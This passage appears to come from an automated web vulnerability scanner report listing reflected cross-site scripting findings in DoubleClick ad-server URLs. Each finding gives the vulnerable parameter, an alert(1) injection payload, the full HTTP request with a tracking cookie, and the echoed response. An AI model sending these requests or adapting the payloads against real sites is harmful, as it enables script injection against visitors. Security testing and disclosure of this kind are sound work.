Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 14 Feb 2011 02:13:56 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4961

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,901 Template Name = Banner Creative (Flash) - In Page
...[SNIP]...
net/click%3Bh%3Dv8/3aae/f/6c/%2a/f%3B235359689%3B0-0%3B0%3B58334028%3B4307-300/250%3B39877283/39895070/1%3B%3B%7Esscs%3D%3fhttp://clk.atdmt.com/goiframe/196247526.198101849/270694586/direct/01%3fhref=&a6b10"-alert(1)-"313bfda1deb=1http%3a%2f%2fwww.nutrisystem.com/jsps_hmr/tracking/click.jsp%3Fiid%3D29572%26rURL%3D/webnoweeksoffernetworks");
var wmode = "opaque";
var bg = "same as SWF";
var dcallowscriptaccess = "never";

var o
...[SNIP]...

1.16. http://ad.doubleclick.net/adi/N4319.msn/B2087123.382 [sz parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N4319.msn/B2087123.382

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 588b5"-alert(1)-"bbb21bc460e was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N4319.msn/B2087123.382;sz=300x250;;sz=300x250;ord=145238134?click=http://clk.atdmt.com/goiframe/196247526.198101849/270694586/direct/01%3fhref=588b5"-alert(1)-"bbb21bc460e HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://redcated/APM/iview/270694586/direct;wi.300;hi.250/01?click=
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 14 Feb 2011 02:13:43 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4924

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,901 Template Name = Banner Creative (Flash) - In Page
...[SNIP]...
.net/click%3Bh%3Dv8/3aae/7/69/%2a/f%3B235359689%3B0-0%3B0%3B58334028%3B4307-300/250%3B39877283/39895070/1%3B%3B%7Esscs%3D%3fhttp://clk.redcated/goiframe/196247526.198101849/270694586/direct/01%3fhref=588b5"-alert(1)-"bbb21bc460ehttp://www.nutrisystem.com/jsps_hmr/tracking/click.jsp?iid=29572&rURL=/webnoweeksoffernetworks");
var wmode = "opaque";
var bg = "same as SWF";
var dcallowscriptaccess = "never";

var openWindow = "fal
...[SNIP]...

1.17. http://ad.doubleclick.net/adi/N5552.3159.GOOGLECN.COM/B5035359.26 [adurl parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5552.3159.GOOGLECN.COM/B5035359.26

Issue detail

The value of the adurl request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c47f2"-alert(1)-"54049c07273 was submitted in the adurl parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N5552.3159.GOOGLECN.COM/B5035359.26;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=B33XYFyxZTbT8PJ_6lAen3LGaC_HctfkBycz95Byx0dnYSwAQARgBIL7O5Q04AFCs18v4BmDJhqOH1KOAEKAB55Lc3gO6AQk3Mjh4OTBfYXPIAQnaAUhmaWxlOi8vL0M6L2Nkbi9leGFtcGxlcy9leHBsb2l0cy9lbnRlcnByaXNlLWV4cGxvaXQtY292ZXJhZ2UtaG95dGxsYy5odG2YAugCuAIYwAIGyALxj7oWqAMB6AO6AugD4gX1AwAAAMQ&num=1&sig=AGiWqtxkJIBXuihO1k2jgZRuF_3PjfgZ4g&client=ca-pub-4063878933780912&adurl=c47f2"-alert(1)-"54049c07273 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1297711267&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2Fcdn%2Fexamples%2Fexploits%2Fenterprise-exploit-coverage-hoytllc.htm&dt=1297689667883&shv=r20101117&jsv=r20110208&saldr=1&correlator=1297689667905&frm=0&adk=200505236&ga_vid=1027971351.1297689668&ga_sid=1297689668&ga_hid=1219644194&ga_fc=0&u_tz=-360&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&dff=times%20new%20roman&dfs=16&biw=1112&bih=1010&eid=33895299&fu=0&ifi=1&dtd=50&xpc=g179VgxXiq&p=file%3A//
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 7835
Cache-Control: no-cache
Pragma: no-cache
Date: Mon, 14 Feb 2011 13:21:34 GMT
Expires: Mon, 14 Feb 2011 13:21:34 GMT

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
GFtcGxlcy9leHBsb2l0cy9lbnRlcnByaXNlLWV4cGxvaXQtY292ZXJhZ2UtaG95dGxsYy5odG2YAugCuAIYwAIGyALxj7oWqAMB6AO6AugD4gX1AwAAAMQ&num=1&sig=AGiWqtxkJIBXuihO1k2jgZRuF_3PjfgZ4g&client=ca-pub-4063878933780912&adurl=c47f2"-alert(1)-"54049c07273http://embassysuites.hilton.com/en/es/promotions/es_morereasonstostay_pt/index.jhtml?WT.mc_id=z1ECNCAA2ES3D4H5MoreReason40543&cssiteid=1004575&csdartid=5784169940013199");
var fscUrl = url;
var fscUr
...[SNIP]...

1.18. http://ad.doubleclick.net/adi/N5552.3159.GOOGLECN.COM/B5035359.26 [ai parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5552.3159.GOOGLECN.COM/B5035359.26

Issue detail

The value of the ai request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1417b"-alert(1)-"b9c926877f7 was submitted in the ai parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N5552.3159.GOOGLECN.COM/B5035359.26;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=B33XYFyxZTbT8PJ_6lAen3LGaC_HctfkBycz95Byx0dnYSwAQARgBIL7O5Q04AFCs18v4BmDJhqOH1KOAEKAB55Lc3gO6AQk3Mjh4OTBfYXPIAQnaAUhmaWxlOi8vL0M6L2Nkbi9leGFtcGxlcy9leHBsb2l0cy9lbnRlcnByaXNlLWV4cGxvaXQtY292ZXJhZ2UtaG95dGxsYy5odG2YAugCuAIYwAIGyALxj7oWqAMB6AO6AugD4gX1AwAAAMQ1417b"-alert(1)-"b9c926877f7&num=1&sig=AGiWqtxkJIBXuihO1k2jgZRuF_3PjfgZ4g&client=ca-pub-4063878933780912&adurl=;ord=874593558? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1297711267&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2Fcdn%2Fexamples%2Fexploits%2Fenterprise-exploit-coverage-hoytllc.htm&dt=1297689667883&shv=r20101117&jsv=r20110208&saldr=1&correlator=1297689667905&frm=0&adk=200505236&ga_vid=1027971351.1297689668&ga_sid=1297689668&ga_hid=1219644194&ga_fc=0&u_tz=-360&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&dff=times%20new%20roman&dfs=16&biw=1112&bih=1010&eid=33895299&fu=0&ifi=1&dtd=50&xpc=g179VgxXiq&p=file%3A//
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 14 Feb 2011 13:21:03 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7889

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
7O5Q04AFCs18v4BmDJhqOH1KOAEKAB55Lc3gO6AQk3Mjh4OTBfYXPIAQnaAUhmaWxlOi8vL0M6L2Nkbi9leGFtcGxlcy9leHBsb2l0cy9lbnRlcnByaXNlLWV4cGxvaXQtY292ZXJhZ2UtaG95dGxsYy5odG2YAugCuAIYwAIGyALxj7oWqAMB6AO6AugD4gX1AwAAAMQ1417b"-alert(1)-"b9c926877f7&num=1&sig=AGiWqtxkJIBXuihO1k2jgZRuF_3PjfgZ4g&client=ca-pub-4063878933780912&adurl=http%3a%2f%2fembassysuites.hilton.com/en/es/promotions/es_morereasonstostay_pt/index.jhtml%3FWT.mc_id%3Dz1ECNCAA2ES3D4
...[SNIP]...

1.19. http://ad.doubleclick.net/adi/N5552.3159.GOOGLECN.COM/B5035359.26 [client parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5552.3159.GOOGLECN.COM/B5035359.26

Issue detail

The value of the client request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 230d9"-alert(1)-"981c7121fd4 was submitted in the client parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N5552.3159.GOOGLECN.COM/B5035359.26;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=B33XYFyxZTbT8PJ_6lAen3LGaC_HctfkBycz95Byx0dnYSwAQARgBIL7O5Q04AFCs18v4BmDJhqOH1KOAEKAB55Lc3gO6AQk3Mjh4OTBfYXPIAQnaAUhmaWxlOi8vL0M6L2Nkbi9leGFtcGxlcy9leHBsb2l0cy9lbnRlcnByaXNlLWV4cGxvaXQtY292ZXJhZ2UtaG95dGxsYy5odG2YAugCuAIYwAIGyALxj7oWqAMB6AO6AugD4gX1AwAAAMQ&num=1&sig=AGiWqtxkJIBXuihO1k2jgZRuF_3PjfgZ4g&client=ca-pub-4063878933780912230d9"-alert(1)-"981c7121fd4&adurl=;ord=874593558? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1297711267&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2Fcdn%2Fexamples%2Fexploits%2Fenterprise-exploit-coverage-hoytllc.htm&dt=1297689667883&shv=r20101117&jsv=r20110208&saldr=1&correlator=1297689667905&frm=0&adk=200505236&ga_vid=1027971351.1297689668&ga_sid=1297689668&ga_hid=1219644194&ga_fc=0&u_tz=-360&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&dff=times%20new%20roman&dfs=16&biw=1112&bih=1010&eid=33895299&fu=0&ifi=1&dtd=50&xpc=g179VgxXiq&p=file%3A//
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 14 Feb 2011 13:21:32 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7887

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
Nkbi9leGFtcGxlcy9leHBsb2l0cy9lbnRlcnByaXNlLWV4cGxvaXQtY292ZXJhZ2UtaG95dGxsYy5odG2YAugCuAIYwAIGyALxj7oWqAMB6AO6AugD4gX1AwAAAMQ&num=1&sig=AGiWqtxkJIBXuihO1k2jgZRuF_3PjfgZ4g&client=ca-pub-4063878933780912230d9"-alert(1)-"981c7121fd4&adurl=http%3a%2f%2fembassysuites.hilton.com/en/es/promotions/es_morereasonstostay_pt/index.jhtml%3FWT.mc_id%3Dz1ECNCAA2ES3D4H5MoreReason40543%26cssiteid%3D1004575%26csdartid%3D5784169940013170");
var
...[SNIP]...

1.20. http://ad.doubleclick.net/adi/N5552.3159.GOOGLECN.COM/B5035359.26 [num parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5552.3159.GOOGLECN.COM/B5035359.26

Issue detail

The value of the num request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload eb08b"-alert(1)-"4523e8dc99a was submitted in the num parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N5552.3159.GOOGLECN.COM/B5035359.26;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=B33XYFyxZTbT8PJ_6lAen3LGaC_HctfkBycz95Byx0dnYSwAQARgBIL7O5Q04AFCs18v4BmDJhqOH1KOAEKAB55Lc3gO6AQk3Mjh4OTBfYXPIAQnaAUhmaWxlOi8vL0M6L2Nkbi9leGFtcGxlcy9leHBsb2l0cy9lbnRlcnByaXNlLWV4cGxvaXQtY292ZXJhZ2UtaG95dGxsYy5odG2YAugCuAIYwAIGyALxj7oWqAMB6AO6AugD4gX1AwAAAMQ&num=1eb08b"-alert(1)-"4523e8dc99a&sig=AGiWqtxkJIBXuihO1k2jgZRuF_3PjfgZ4g&client=ca-pub-4063878933780912&adurl=;ord=874593558? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1297711267&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2Fcdn%2Fexamples%2Fexploits%2Fenterprise-exploit-coverage-hoytllc.htm&dt=1297689667883&shv=r20101117&jsv=r20110208&saldr=1&correlator=1297689667905&frm=0&adk=200505236&ga_vid=1027971351.1297689668&ga_sid=1297689668&ga_hid=1219644194&ga_fc=0&u_tz=-360&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&dff=times%20new%20roman&dfs=16&biw=1112&bih=1010&eid=33895299&fu=0&ifi=1&dtd=50&xpc=g179VgxXiq&p=file%3A//
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 14 Feb 2011 13:21:13 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7889

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
AFCs18v4BmDJhqOH1KOAEKAB55Lc3gO6AQk3Mjh4OTBfYXPIAQnaAUhmaWxlOi8vL0M6L2Nkbi9leGFtcGxlcy9leHBsb2l0cy9lbnRlcnByaXNlLWV4cGxvaXQtY292ZXJhZ2UtaG95dGxsYy5odG2YAugCuAIYwAIGyALxj7oWqAMB6AO6AugD4gX1AwAAAMQ&num=1eb08b"-alert(1)-"4523e8dc99a&sig=AGiWqtxkJIBXuihO1k2jgZRuF_3PjfgZ4g&client=ca-pub-4063878933780912&adurl=http%3a%2f%2fembassysuites.hilton.com/en/es/promotions/es_morereasonstostay_pt/index.jhtml%3FWT.mc_id%3Dz1ECNCAA2ES3D4H5More
...[SNIP]...

1.21. http://ad.doubleclick.net/adi/N5552.3159.GOOGLECN.COM/B5035359.26 [sig parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5552.3159.GOOGLECN.COM/B5035359.26

Issue detail

The value of the sig request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 862c5"-alert(1)-"b9cec4b80de was submitted in the sig parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N5552.3159.GOOGLECN.COM/B5035359.26;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=B33XYFyxZTbT8PJ_6lAen3LGaC_HctfkBycz95Byx0dnYSwAQARgBIL7O5Q04AFCs18v4BmDJhqOH1KOAEKAB55Lc3gO6AQk3Mjh4OTBfYXPIAQnaAUhmaWxlOi8vL0M6L2Nkbi9leGFtcGxlcy9leHBsb2l0cy9lbnRlcnByaXNlLWV4cGxvaXQtY292ZXJhZ2UtaG95dGxsYy5odG2YAugCuAIYwAIGyALxj7oWqAMB6AO6AugD4gX1AwAAAMQ&num=1&sig=AGiWqtxkJIBXuihO1k2jgZRuF_3PjfgZ4g862c5"-alert(1)-"b9cec4b80de&client=ca-pub-4063878933780912&adurl=;ord=874593558? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1297711267&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2Fcdn%2Fexamples%2Fexploits%2Fenterprise-exploit-coverage-hoytllc.htm&dt=1297689667883&shv=r20101117&jsv=r20110208&saldr=1&correlator=1297689667905&frm=0&adk=200505236&ga_vid=1027971351.1297689668&ga_sid=1297689668&ga_hid=1219644194&ga_fc=0&u_tz=-360&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&dff=times%20new%20roman&dfs=16&biw=1112&bih=1010&eid=33895299&fu=0&ifi=1&dtd=50&xpc=g179VgxXiq&p=file%3A//
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 14 Feb 2011 13:21:23 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7889

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
4OTBfYXPIAQnaAUhmaWxlOi8vL0M6L2Nkbi9leGFtcGxlcy9leHBsb2l0cy9lbnRlcnByaXNlLWV4cGxvaXQtY292ZXJhZ2UtaG95dGxsYy5odG2YAugCuAIYwAIGyALxj7oWqAMB6AO6AugD4gX1AwAAAMQ&num=1&sig=AGiWqtxkJIBXuihO1k2jgZRuF_3PjfgZ4g862c5"-alert(1)-"b9cec4b80de&client=ca-pub-4063878933780912&adurl=http%3a%2f%2fembassysuites.hilton.com/en/es/promotions/es_morereasonstostay_pt/index.jhtml%3FWT.mc_id%3Dz1ECNCAA2ES3D4H5MoreReason40543%26cssiteid%3D1004575%26csda
...[SNIP]...

1.22. http://ad.doubleclick.net/adi/N5552.3159.GOOGLECN.COM/B5035359.26 [sz parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5552.3159.GOOGLECN.COM/B5035359.26

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8e7f3"-alert(1)-"8abaf15a711 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N5552.3159.GOOGLECN.COM/B5035359.26;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l8e7f3"-alert(1)-"8abaf15a711&ai=B33XYFyxZTbT8PJ_6lAen3LGaC_HctfkBycz95Byx0dnYSwAQARgBIL7O5Q04AFCs18v4BmDJhqOH1KOAEKAB55Lc3gO6AQk3Mjh4OTBfYXPIAQnaAUhmaWxlOi8vL0M6L2Nkbi9leGFtcGxlcy9leHBsb2l0cy9lbnRlcnByaXNlLWV4cGxvaXQtY292ZXJhZ2UtaG95dGxsYy5odG2YAugCuAIYwAIGyALxj7oWqAMB6AO6AugD4gX1AwAAAMQ&num=1&sig=AGiWqtxkJIBXuihO1k2jgZRuF_3PjfgZ4g&client=ca-pub-4063878933780912&adurl=;ord=874593558? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1297711267&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2Fcdn%2Fexamples%2Fexploits%2Fenterprise-exploit-coverage-hoytllc.htm&dt=1297689667883&shv=r20101117&jsv=r20110208&saldr=1&correlator=1297689667905&frm=0&adk=200505236&ga_vid=1027971351.1297689668&ga_sid=1297689668&ga_hid=1219644194&ga_fc=0&u_tz=-360&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&dff=times%20new%20roman&dfs=16&biw=1112&bih=1010&eid=33895299&fu=0&ifi=1&dtd=50&xpc=g179VgxXiq&p=file%3A//
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 14 Feb 2011 13:20:53 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7889

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
l = escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3aae/f/19f/%2a/c%3B234501632%3B1-0%3B0%3B57841699%3B3454-728/90%3B40013199/40030986/2%3B%3B%7Esscs%3D%3fhttp://googleads.g.doubleclick.net/aclk?sa=l8e7f3"-alert(1)-"8abaf15a711&ai=B33XYFyxZTbT8PJ_6lAen3LGaC_HctfkBycz95Byx0dnYSwAQARgBIL7O5Q04AFCs18v4BmDJhqOH1KOAEKAB55Lc3gO6AQk3Mjh4OTBfYXPIAQnaAUhmaWxlOi8vL0M6L2Nkbi9leGFtcGxlcy9leHBsb2l0cy9lbnRlcnByaXNlLWV4cGxvaXQtY292ZXJhZ2Ut
...[SNIP]...

1.23. http://ad.doubleclick.net/adi/interactive.wsj.com/articletools_sponsor [!category parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/interactive.wsj.com/articletools_sponsor

Issue detail

The value of the !category request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f6345"style%3d"x%3aexpression(alert(1))"760be3c0573 was submitted in the !category parameter. This input was echoed as f6345"style="x:expression(alert(1))"760be3c0573 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /adi/interactive.wsj.com/articletools_sponsor;!category=;page=article;msrc=WSJ_hp_MIDDLENexttoWhatsNewsThird;;mc=b2pfreezone_super;tile=2;sz=234x31;ord=2655265526552655;f6345"style%3d"x%3aexpression(alert(1))"760be3c0573 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/article/SB10001424052748704329104576138271281667798.html?mod=WSJ_hp_MIDDLENexttoWhatsNewsThird
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 14 Feb 2011 01:36:49 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 485

